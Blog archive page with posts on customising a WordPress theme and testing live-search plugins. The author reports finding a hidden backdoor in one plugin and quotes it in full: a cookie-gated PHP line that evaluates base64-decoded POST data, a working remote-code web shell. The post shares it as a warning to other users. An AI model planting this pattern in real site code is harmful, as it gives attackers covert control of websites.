Tag Archives: Addicted to live search plugin

New theme part III

After last night's debacle with the live search plugin, I tried another one that was based on it: Live search popup. Unfortunately that one didn’t display very well in my theme, so I just removed it and won’t be offering a “Web 2.0” search option for now.

Further changes to the Freshy2 theme and WordPress:

  • I’ve added a none.gif to the background images folder, since I got loads of 404 messages about it not being in there.
  • I’ve copied the default search box style (#s) from the WordPress theme and removed the “white” background color so you can see what you type when searching. Unfortunately I now need a black anti-aliased version of the search icon.
  • I’ve added a header to the search widget (guess that will be gone on the next WP update from Debian, as soon as the TinyMCE maintainer updates TinyMCE). Not sure if I really want it to stay, but if I do I need to find a better way to add it.

Now I “just” need to work on the <pre> and <code> output of the theme, since reading it is not very easy at the moment.

And I found why the Live search plugin didn’t work. It uses the deprecated get_bloginfo('siteurl'), while it should be using get_bloginfo('wpurl'). But well, after having contact with the maintainer of it, I won’t be using it. He is not interested in maintaining it, so better not to use that one.

New theme continued: why not to trust plugins

With this new theme I also saw that it was compatible with the “Addicted to live search plugin”[1]. (Un)fortunately this plugin doesn’t work out of the box either, at least not if you do not have WordPress running directly in the root.

But… Since I was looking at the code to fix this I also found:

<?php if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; } ?>

No thank you very much!

So what did we learn: Never ever trust WordPress plugins… So do not use this (version of the) plugin, unless you know how to remove this piece of code!

I’ll check out after some sleep what WordPress has to offer when you find a vulnerability like this in a plugin, so perhaps users of it can be warned… And I’ll fix this plugin later also, to be continued…

Update: it seems that it’s fixed. Although I’m not sure how the WordPress auto-update feature could create a line of code like that (as in, this sounds like bollocks to me).


[1] Funny sidenote, I found this blog two years ago and commented on one of his articles on Oracle.